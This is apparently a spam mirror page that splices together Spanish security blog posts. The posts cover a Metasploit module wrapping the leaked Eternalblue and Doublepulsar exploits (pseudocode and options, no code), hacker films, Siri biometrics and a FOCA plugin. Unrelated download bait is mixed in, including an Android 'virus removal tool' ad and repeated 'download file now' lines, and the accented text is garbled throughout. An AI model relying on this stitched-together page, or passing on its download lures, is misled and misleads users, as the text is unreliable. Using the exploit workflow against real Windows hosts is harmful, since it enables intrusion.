Por el camino surgi� otro problema, y es que el exploit Eternalblue y Doublepulsar son binarios para Windows. Le pregunt� a Sheila y ella me contest� "�Qui�n utiliza Metaspoit en Windows?". Con la boca chica pens� en confesar que yo algunas veces (te toca torear en pelear en el campo de batalla que te toca), pero ella estaba en lo cierto, generalmente Metasploit se utiliza en sistemas Linux. Adem�s, nosotros quer�amos hacerlo con nuestro querido Kali Linux.
La respuesta aqu� no se hizo esperar, nos tocar�a tirar de Wine para que el m�dulo de Metasploit lo utilice y pueda lanzar los binarios con sus configuraciones. Hay que tener en cuenta que para que el m�dulo funcione correctamente en sistemas Kali Linux tenemos que tener instalado Wine con compatibilidad para binarios de 32 bits.
Detectar v�ctimas vulnerables a Eternalblue
El pasado martes 17 de Abril se public� un m�dulo auxiliary de Metasploit que permite detectar en una red si alguno de los equipos es vulnerable al CVE-2017-010, es decir, a Eternalblue. Decid� probar el m�dulo y ver un poco c�mo estaba hecho y la sensaci�n es que la liberaci�n del c�digo del exploit est� muy cerca.
![]() |
| Figura 6: Uso del modulo auxiliary (cve-2017-010) en Metasploit |
Si eres un personal de IT te recomendamos que apliques los parches de seguridad para esta vulnerabilidad lo antes posible las m�quinas de tu empresa o dominio, ya que es una vulnerabilidad cr�tica que podr�a ser explotada por cualquiera, al no requerir la interacci�n por parte del usuario, solamente disponer de conectividad con la m�quina.
Nuestro m�dulo para Metasploit: eternalblue_doublepulsar o eternal11
La historia del nombre del m�dulo nos dar�a para otro art�culo entre Sheila y yo, pero baste decir que le pusimos eternal11. El algoritmo utilizado para este caso os lo dejo aqu� en un sencillo pseudoc�digo:
� Disponemos de un SKELETON del fichero XML de Eternalblue. Este SKELETON contiene una serie de palabras clave, por ejemplo %RPORT%, %RHOST%, %TIMEOUT%.
![]() |
| Figura 7: Skeleton.XML de Eternalblue |
� Cada vez que invocamos la funci�n exploit este fichero es copiado con el nombre Eternalblue-2.2.0.xml, el cual es el que utiliza el binario para leer los valores.
� Una vez copiado el fichero con el nombre original, se sustituye en el fichero las palabras clave por los valores que el usuario introduzca en los atributos de Metasploit. Por ejemplo, si el usuario configura RHOST apuntando a la direcci�n 10.0.0.10, el campo %RHOST% del fichero XML ser� sustituido por la direcci�n IP real. As� ocurre con todos los campos.
� Ocurre igual con el XML de Doublepulsar. Tenemos un SKELETON d�nde se ir�n sustituyendo los valores, en este caso los valores personalizables son: %RHOST%, %RPORT%, %TIMEOUT%, %TARGETARCHITECTURE%, %DLLPAY%, %PROCESSINJECT%.
� A continuaci�n, se genera una DLL con el Payload que se haya setteado con Set PAYLOAD. La DLL se almacenar� d�nde se indique en el atributo PathDLLInjection del m�dulo.
� Despu�s, se lanzan los binarios: primero Eternalblue y despu�s Doublepulsar.El m�dulo desarrollado tiene las siguientes opciones avanzadas:
� TargetArchitecture: Podr� elegirse entre x86 y x64. Le indica a Doublepulsar la arquitectura d�nde inyectar� la DLL.
� PathEternalBlue: Indica la ruta d�nde se encuentra el binario de Eternalblue. Hay que recordar que el sistema, si estamos en Linux, debe contar con Wine. Por otro lado, hay que tener cuidado con las dependencias que tiene el binario, librer�as en x86 o x64, tienen que ser accesibles por el binario, y por Wine en el caso de Linux.
� PathDoublePulsar: Indica la ruta d�nde se encuentra el binario de Doublepulsar.
� PathDLLInjection: Indica la ruta d�nde se almacenar� la DLL. Adem�s, este path se incluir� en el XML de Doublepulsar para que el binario sepa de d�nde cargarla. � NameDLL. Nombre que se le dar� a la DLL. Por defecto es eternal11.dll.
� ProcessInject: Proceso en el que se har� la inyecci�n de la DLL.Y por fin, cuando lancemos el m�dulo contra un sistema vulnerable al CVE-2017-010 de Windows 7 o Windows Server 2008R2 veremos algo parecido a esto que pod�is ver en la imagen siguiente.
![]() |
| Figura 8: Explotaci�n con �xito del m�dulo de eternal11 sobre un Windows vulnerable |
Ha sido divertido pasar unas horas locas trabajando en esto e intentando hacer un m�dulo que pueda ayudar a auditar los sistemas Microsoft d�nde Eternalblue sigue presente. En el siguiente v�deo tienes una demostraci�n de este m�dulo funcionando.
Figura 9: PoC de explotaci�n de Eternalblue y Doublepulsar con Metasploit
Figura 10: PoC de explotaci�n de Eternalblue y Doublepulsar con Metasploit
sobre Windows 7 y Windows Server 2008 R2 en versiones x64.
sobre Windows 7 y Windows Server 2008 R2 en versiones x64.
Actualiza lo antes posible todos tus sistemas Microsoft Windows vulnerables y prot�gete de las amenazas que han surgido con este leak de exploits. Quiero agradecer el trabajo de mi compa�era Sheila A. Berta y como viene en la descripci�n del m�dulo:
�** THIS IS AN INTEGRATION OF THE ORIGINAL EXPLOIT, ITS NOT THE FULL PORTATION**�
Autor: Pablo Gonz�lez P�rez (@pablogonzalezpe)
Escritor de los libros "Metasploit para Pentesters", "Ethical Hacking", "Got Root" y �Pentesting con Powershell�, Microsoft MVP en Seguridad y Security Researcher en ElevenPaths
Sigue Un inform�tico en el lado del mal - Google+ RSS 0xWord

download file now
Labels:
2008,
7,
con,
de,
doublepulsar,
eternalblue,
hackear,
metasploit,
r2,
shadowbroker,
usando,
windows,
y
Download Mod Texture Sasuke Student Y Shin Otsu With Tenseigan x Saringan NSUNH3 For Emulator PPSSPP
Download Mod Texture Sasuke Student Y Shin Otsu With Tenseigan x Saringan NSUNH3 For Emulator PPSSPP

Monkey Virus Removel Tool
How To use !
Download Monkey virus removel Tool from above download link
In simple way you can remove any android partition virus in a few seconds
After Downloading tool open it like above screenshot will appear on the screen
You have to no need any box any other cost material
Just connect your device with high speed USB data cable through pc
Scan port in the tool tab and after connecting android device click on start
Wait a few second when process goes to 100 it will be done
Remove your device from USB data cable and perform a factory data reset
After performing instruction guide from your device enjoy
Important Note:
For removing monkey virus from your android devices you have to no need any
Software Box Device
Just a USB data cable
Auto detect android device
No network frame required
No data lose
Only infected app will be removed
Tested on many devices successfully
download file now
Eventos conferencias y cursos del 3 al 6 de Mayo Drupal Watson Hacking Prestashop BD Machine Learning
Eventos conferencias y cursos del 3 al 6 de Mayo Drupal Watson Hacking Prestashop BD Machine Learning
A pesar de que la semana que viene es un tanto extra�a por el puente de vacaciones en el que estamos inmersos, hay algunas actividades que van a tener lugar en esos d�as, y en concreto yo voy a participar en un evento que tendr� lugar en Londres. Esto es lo que tenemos por delante estos d�as.
![]() |
| Figura 1: Eventos, conferencias y cursos del 3 al 6 de Mayo |
Yo estar� el mi�rcoles d�a 3 de Mayo por v�deo-conferencia en el 5th CDO Forum que se har� en la reuni�n de Londres. Yo voy a hablar de Big Data, Information Security & Cognitive Intelligence en Telef�nica. Ah� se va a dar un premio al CDO del a�o por ser el que m�s cambios ha llevado a su organizaci�n con su trabajo y yo he tenido el honor de ser nominado como uno de los finalistas, as� que m�s que agradecido por ello.
![]() |
| Figura 2: 5th CDO Forum |
En Barcelona, ese mi�rcoles a las 19:00 tendr� lugar en el Mobile World Centre de Movistar una conferencia centrada en el Machine Learning en la que participar�n nuestro compa�ero Alexandros Kartzoglou, Director Cient�fico de Telef�nica Research y Jos� A. Rodr�guez-Serrano jefe del equipo de ciencias de datos de BBVA Data & Analytics. M�s info:
![]() |
| Figura 3: BCN Analytics Machine Learning I |
Tambi�n el d�a 3 de Mayo, a las 19:00 en la FlagShip de Telef�nica en Gran V�a, tendr� lugar una charla gratuita de Desarrollo de una asistente virtual con Watson. Tienes la informaci�n en el MeetUp de Bot Dev Madrid.
![]() |
| Figura 4: Desarrollo de un asistente virtual con IBM Watson |
El d�a 4, con el Centro de Ciberseguridad Industrial, participaremos en un evento gratuito que tendr� lugar en Madrid, donde hablaremos de como se puede hacer el proceso de "Automatizaci�n de un Sistema de Gesti�n de la Ciberseguridad Industrial con SandaS GRC". Tienes informaci�n completa de la agenda del evento y el proceso de registro en la siguiente direcci�n web:
![]() |
| Figura 5: Beneficios de la ciberseguridad para las organizaciones industriales |
El mismo d�a 4 de Mayo, a las 9 de la ma�ana en otro lugar de Madrid tiene lugar el PrestaShop Day para todos aquellos que quieran potenciar su e-commerce con esta tecnolog�a. Como sab�is, 0xWord est� desarrollado sobre PrestaShop y en ElevenPaths creamos el plugin de Latch para proteger PrestaShop, de hecho puedes probar Latch en el PrestaShop de 0xWord. Tienes info del evento en esta direcci�n web:
![]() |
| Figura 6: PrestaShop Day Madrid |
El viernes 5 tendr� lugar el curso online de "Auditor�a y Hacking Web" que podr�s hacer v�a HackersClub. Todos los participantes, se llevar�n tambi�n el libro de 0xWord de Hacking Web Technologies donde yo escrib� varios cap�tulos.
![]() |
| Figura 7: Curso Online de Auditor�a y Hacking Web |
Y para terminar, ten�is el Drupalcamp en Madrid, los d�as 5 y 6 de Mayo (viernes y s�bado) para dedicar el fin de semana a hacer comunidad y aprender. S�, tambi�n tienes un plugin para proteger Drupal con Latch.
![]() |
| Figura 8: Drupalcamp Spain 2017 |
Saludos Malignos!
Sigue Un inform�tico en el lado del mal - Google+ RSS 0xWord

download file now
Monday, September 18, 2017
Una lista de películas y series que todo hacker debe ver
Una lista de películas y series que todo hacker debe ver
No s�lo de ver un monitor vive el hombre, tambi�n se dedican Pero, �cu�les son aquellas calificadas como pertenecientes al g�nero hacker (a veces tambi�n cyberpunk o geek)? �y de esas cu�les son las que agitan tu mente y te levantan del asiento para correr hacia tu port�til a hackear y dominar el mundo?
Evidentemente cada uno tiene sus gustos y preferencias, y lo que llama a unos a otros les causa rechazo o indiferencia, por lo que hacer un top de pel�culas y series ser�a bastante personal y subjetivo.
Lo que por el contrario s� es bastante objetivo es un recopilatorio publicado en Github por el griego Nikolaos Kamarinakis, que recoge un impresionante listado de pel�culas y series puntuada con la valoraci�n media de los usuarios de IMDB.
�Cu�les te faltan por ver?
Pel�culas
Thrillers / Pel�culas de Drama
| PEL�CULA | G�NERO | A�O | PUNTUACI�N |
|---|---|---|---|
| WarGames: The Dead Code | Thriller/Drama | 2008 | 4.5/10 |
| WarGames | Thriller/Drama | 1983 | 7.1/10 |
| Hackers | Crimen/Drama | 1995 | 6.2/10 |
| Anonymous | Crimen/Drama/Thriller | 2016 | 6.4/10 |
| Antitrust | Thriller/Drama | 2001 | 6.1/10 |
| Reboot | Thriller/Drama | 2012 | 4.1/10 |
| Takedown | Thriller/Drama | 2000 | 6.3/10 |
| 23 | Thriller/Drama | 1998 | 7.3/10 |
| The Net | Thriller/Drama | 1995 | 5.8/10 |
| The Net 2.0 | Thriller/Drama | 2006 | 4.7/10 |
| Underground: The Julian Assange Story | Drama/Biograf�a | 2012 | 6.8/10 |
| The Fifth Estate | Thriller/Drama | 2013 | 6.2/10 |
| The Social Network | Drama/Historia | 2010 | 7.7/10 |
| Enemy of the State | Thriller/Drama | 1998 | 7.3/10 |
| The Girl with the Dragon Tattoo | Thriller/Drama | 2011 | 7.8/10 |
| Snowden | Drama/Thriller | 2016 | 7.3/10 |
| Algorithm | Crimen/Drama/Thriller | 2014 | 4.8/10 |
| Who Am I | Crimen/Drama | 2014 | 7.6/10 |
| Hackers Game | Drama/Thriller | 2015 | 3.8/10 |
| Blackhat | Drama/Thriller | 2015 | 5.4/10 |
| The Thirteenth Floor | Thriller/Misterio | 1999 | 7/10 |
| Swordfish | Acci�n/Thriller | 2001 | 6.5/10 |
| Live Free or Die Hard | Thriller/Acci�n | 2007 | 7.2/10 |
| Untraceable | Slasher/Thriller | 2008 | 6.2/10 |
| The Imitation Game | Drama/Thriller | 2014 | 8.2/10 |
| Pi | Drama/Misterio | 1998 | 7.5/10 |
| Primer | Drama/Thriller | 2004 | 7.0/10 |
| Listening | Thriller/Drama | 2014 | 5.6/10 |
Pel�culas de Ciencia ficci�n / Fantas�a
| PEL�CULA | G�NERO | A�O | PUNTUACI�N |
|---|---|---|---|
| The Matrix | Fantas�a/Acci�n | 1999 | 8.7/10 |
| The Lawnmower Man | Fantas�a/Acci�n | 1992 | 5.4/10 |
| Open Windows | Fantas�a/Crimen | 2014 | 5.2/10 |
| Ex Machina | Fantasy/Misterio | 2015 | 7.7/10 |
| eXistenZ | Ciencia ficci�n/Thriller | 1999 | 6.8/10 |
| One Point O | Misterio/Ciencia ficci�n | 2004 | 6.2/10 |
| Inception | Misterio/Ciencia ficci�n | 2010 | 8.8/10 |
| Ghost in the Shell | Fantas�a/Animaci�n | 1995 | 8/10 |
| Avalon | Fantas�a/Ciencia ficci�n | 2001 | 6.6/10 |
| Blade Runner | Ciencia ficci�n/Thriller | 1982 | 8.2/10 |
| Her | Ciencia ficci�n/Romance | 2013 | 8.0/10 |
| World on a Wire | Ciencia ficci�n/Thriller | 1973 | 7.9/10 |
| Transcendence | Ciencia ficci�n/Drama | 2014 | 6.3/10 |
| Johnny Mnemonic | Ciencia ficci�n/Acci�n | 1995 | 5.6/10 |
Pel�culas de Acci�n
| PEL�CULA | G�NERO | A�O | PUNTUACI�N |
|---|---|---|---|
| Sneakers | Thriller/Acci�n | 1992 | 7.1/10 |
| Firewall | Thriller/Acci�n | 2006 | 5.8/10 |
| Gamer | Thriller/Acci�n | 2009 | 5.8/10 |
| Virtuosity | Thriller/Acci�n | 1995 | 5.5/10 |
| Eagle Eye | Thriller/Acci�n | 2008 | 6.6/10 |
| Tron | Acci�n/Aventuras | 1982 | 6.8/10 |
| Tron: Legacy | Acci�n/Aventuras | 2010 | 6.8/10 |
| The Italian Job | Thriller/Acci�n | 2003 | 7.0/10 |
| Echelon Conspiracy | Acci�n/Crimen/Misterio | 2009 | 5.8/10 |
Documentales
| PEL�CULA | G�NERO | A�O | PUNTUACI�N |
|---|---|---|---|
| Pirates of Silicon Valley | Television Film/Docudrama | 1999 | 7.3/10 |
| Freedom Downtime | Documental | 2001 | 7.6/10 |
| The Code | Documental | 2001 | 7.5/10 |
| Code 2600 | Documental | 2012 | 7.4/10 |
| Revolution OS | Indie/Documental | 2001 | 7.3/10 |
| Hackers Are People Too | Corto/Documental | 2008 | 6.1/10 |
| We Are Legion: The Story of the Hacktivists | Documental | 2012 | 7.3/10 |
| The KGB, the Computer and Me | Documental | 1990 | 8.3/10 |
| Hacking Democracy | Documental | 2006 | 7.9/10 |
| Citizenfour | Biograf�a/Documental | 2014 | 8.1/10 |
| We Steal Secrets: The Story of WikiLeaks | Documental | 2013 | 6.9/10 |
| TPB AFK: The Pirate Bay Away from Keyboard | Documental | 2013 | 7.6/10 |
| War for the Web | Documental | 2015 | 7.4/10 |
| Downloaded | Documental | 2013 | 6.8/10 |
| Steal This Film | Corto/Documental | 2006 | 7.1/10 |
| Deep Web | Documental | 2015 | 7.1/10 |
| DEFCON: The Documental | Documental | 2013 | 5.7/10 |
| DSKNECTD | Documental | 2013 | 7.4/10 |
| The Hacker Wars | Documental | 2014 | 6.6/10 |
| Hackers Wanted | Indie/Documental | 2009 | 6.5/10 |
| The Secret History Of Hacking | Documental | 2001 | 7.6/10 |
| Zero Days | Documental | 2016 | 7.8/10 |
| The Singularity | Drama/Ciencia ficci�n | 2012 | 7.3/10 |
| The Internets Own Boy: The Story of Aaron Swartz | Documental | 2014 | 8.1/10 |
| Terms and Conditions May Apply | Documental | 2013 | 7.4/10 |
| BBS: The Documental | Documental | 2005 | 8.7/10 |
| Good Copy Bad Copy | Documental | 2007 | 7.2/10 |
| Plug and Pray | Documental | 2010 | 7.2/10 |
Series de TV
| T�TULO | G�NERO | A�O | PUNTUACI�N |
|---|---|---|---|
| Mr. Robot | Thriller/Drama | 2015 | 8.7/10 |
| Silicon Valley | Comedia | 2014 | 8.5/10 |
| The IT Crowd | Comedia | 2006 | 8.6/10 |
| Halt and Catch Fire | Drama | 2014 | 8.3/10 |
| Dark Net | Documental Series | 2016 | 7.3/10 |
| Black Mirror | Drama/Ciencia ficci�n | 2011 | 8.9/10 |
| Person of Interest | Acci�n/Crime/Drama | 2011 | 8.5/10 |
| Westworld | Drama/Misterio | 2016 | 9.0/10 |
| You Are Wanted | Drama/Thriller | 2017 | N/A |
Otras listas
Aqu� hay otras listas tambi�n muy interesantes.
Awesome
awesome-hacking - Una lista de tutoriales, herramientas y recursos impresionantes de Hacking. awesome-security - Una impresionante colecci�n de software, librer�as, documentos, libros, recursos y cosas actuales sobre seguridad. awesome-sec-talks - Una recopilaci�n de charlas de seguridad impresionantes.
Misc
terminals-are-sexy - Una lista para CLI lovers. seclists - SecLists. security list - Gran lista de seguridad for fun and profit. DragonJAR - Las mejores 20++ pel�culas Hackers.
- eldiario.es - Las cinco pel�culas m�s veneradas por los hackers
20minutos - Ranking de **PELICULAS SOBRE HACKERS**
- 1000tipsinformaticos - Las 7 mejores pel�culas y documentales sobre hackers que debes ver
Contribuciones
Si quieres contribuir y alimentar este fant�stico recopilatorio en Github, no lo dudes y visita la gu�a correspondiente.download file now
Saturday, September 16, 2017
El reconocimiento de voz biométrico en Oye Siri y la seguridad
El reconocimiento de voz biométrico en Oye Siri y la seguridad
Si has ido a configurar el servicio de "Oye Siri" en espa�ol, o "Hey Siri" en ingl�s, habr�s visto que tienes que pasar por un reconocimiento de tu forma personal de decir ese comando. Debes decir varias veces "Oye Siri" para que el terminal aprenda la forma en qu� lo dices. Es decir, iOS va a crear algo similar a un patr�n biom�trico de tu voz para que puedas despertar a Siri sin tocar el bot�n Home de forma pronunciada.
![]() |
| Figura 1: El reconocimiento de voz biom�trico en "Oye Siri" y la seguridad |
Con este peque�o entrenamiento, al igual que con el entrenamiento biom�trico de Touch ID, lo que se consigue es que el terminal - sin necesidad de utilizar los servicios de la nube de Apple para reconocer tu voz - pueda saber que quieras abrir Siri. O lo que es lo mismo, el terminal iPhone est� escuchando todo el rato para ver si es capaz de reconocer el patr�n de "Oye Siri" dicho por ti en la cercan�a sin enviarlo a Apple - para evitar otro caso como el de las televisiones Samsung -.
![]() |
| Figura 2: Setup de "Oye Siri" en iPhone 7 |
Esto es as�, porque si tu terminal iPhone tuviera que estar enviando todo lo que escucha en el ambiente a los servidores de Apple para saber si se ha dicho "Oye Siri", entonces el consumo de datos m�viles se podr�a disparar, generando un problema al due�o del dispositivo.
�Sirve para mejorar la seguridad?
�Sirve para mejorar la seguridad?
Debido a este comportamiento, se genera un peque�o efecto paralelo de seguridad, ya que nadie m�s puede despertar a Siri con un comando de voz si no tiene tu voz, ya que el comando de "Oye Siri" est� asociado a tu patr�n biom�trico. Pero no debe llevar a nadie a enga�o, Siri seguir� atendiendo desde tu terminal a cualquier comando emitido con cualquier voz.
![]() |
| Figura 3: Configuraci�n de Oye Siri en Siri. Para que funcione con la pantalla bloqueada debe habilitarse Siri para que funcione tambi�n con el bot�n Home. |
Es decir, el comando "Oye Siri" se reconoce en local y solo el due�o del terminal podr� utilizar este comando porque est� asociado a la biometr�a de su voz. Sin embargo, para que este comando pueda ser utilizado cuando el terminal est� bloqueado, debe permitirse utilizar Siri con la pantalla bloqueada, lo que no tiene mucho sentido.
Los trucos de Hacking iPhone con Siri
Los trucos de Hacking iPhone con Siri
Si se permite utilizar Siri con la pantalla bloqueada, entonces cualquier persona podr� utilizar alguno de los m�ltiples trucos de hacking iOS que existen usando Siri, sin importar para nada que no tenga tu voz. S�, no podr� despertar a Siri con el comando "Oye Siri", pero s� que podr� hacerlo pulsando el bot�n Home. Yo lo he probado ayer mismo con el truco de bar para robar cuentas de Gmail o Hotmail con Siri, en un terminal con el comando "Oye Siri" entrenado.
Figura 4: Robar una cuenta de Gmail o Hotmail con Siri
Si el due�o del terminal bloquea el uso de Siri con la pantalla bloqueada, entonces no podr� utilizar tampoco el comando "Oye Siri" para despertar a Siri, a menos que el dispositivo est� desbloqueado. Lo que no tiene mucho sentido. Lo que deber�a permitirse en la configuraci�n es que con la pantalla bloqueada no funcionara despertar a Siri pulsando el bot�n Home, pero s� utilizando el patr�n biom�trico del comando "Oye Siri" del due�o del terminal. A ver si Apple se da cuenta y lo arregla para subir un poco el nivel de seguridad, sin necesidad de perjudicar el nivel de usabilidad.
Saludos Malignos!
Sigue Un inform�tico en el lado del mal - Google+ RSS 0xWord

download file now
Friday, September 15, 2017
Fear the FOCA Descargar FOCA y el plugin de Certificate Transparency Checker para FOCA
Fear the FOCA Descargar FOCA y el plugin de Certificate Transparency Checker para FOCA
Nuestra querida FOCA Final Version sigue siendo una de las herramientas m�s populares, y las descargas de la misma siguen siendo much�simas. Si te has le�do el libro de Pentesting con FOCA, sabr�s que existe la posibilidad de extender la funcionalidad b�sica de la misma por medio de un sistema de plugins, y esto es lo que desde el laboratorio de ElevenPaths acaban de hacer.
![]() |
| Figura 1: Descargar FOCA Final Version y el plugin de Certificate Transparency Checker para FOCA |
Hace poco, desde el equipo de ElevenPaths en Buenos Aires, se lanz� el plugin gratuito Certificate Transparency Checker para Mozilla Firefox, que muchos usuarios han comenzado a utilizar y que permite verificar las opciones de Certificate Transparency de los sitios web que visitas solo con tenerlo activado.
Figura 2: Instalaci�n y uso de Certificate Transparency Checker para Mozilla Firefox
Ahora, se ha incorporado dentro de las caracter�sticas de la FOCA, por lo que si te descargas el Plugin de Certificate Transparency Checker para FOCA y lo instalas, podr�s verificar cu�les son las opciones de seguridad de todos los sitios que se son escaneados.
Una vez que descargues el plugin en una carpeta, ver�s que hay un librer�a DLL que deber�s cargar dentro de nuestra querida FOCA rosa. Es importante recordar que la librer�a BouncyCastle.Crypto.dll debe copiarse al mismo directorio que el ejecutable de FOCA Final Version.
| Figura 3: Ficherso en el plugin de Certificate Transparency Checker para FOCA |
Para ello, vete a la secci�n de plugins, y dale a a�adir uno nuevo. En el cuadro de dialogo que te aparezca deber�s seleccionar la librer�a DLL que se llama CertificateTransparencyChecker.dll y deber�s tenerla en la carpeta Plugins para que FOCA pueda extender la funcionalidad que ofrece de serie.
| Figura 4: Selecci�n de la DLL del plugin |
A partir de ese momento, podr�s utilizar la verificaci�n de los SCT de cada sitio web que solicites directamente desde FOCA, tal y como se ve en esta imagen.
| Figura 5: Certificate Transparency Checker corriendo en FOCA |
Para que veas lo f�cil que es extender tu funcionalidad de FOCA y lo sencillo que es utilizarlo, hemos hecho este v�deo de dos minutos.
Figura 5: Instalaci�n y uso de Certificate Transparency Checker en FOCA
Puedes descargar la FOCA desde la web de ElevenPaths y el plugin Certificate Transparency Checcker para FOCA desde esta URL de la web del laboratorio de ElevenPaths.
Fear the FOCA!
Sigue Un inform�tico en el lado del mal - Google+ RSS 0xWord

download file now
Subscribe to:
Posts (Atom)






























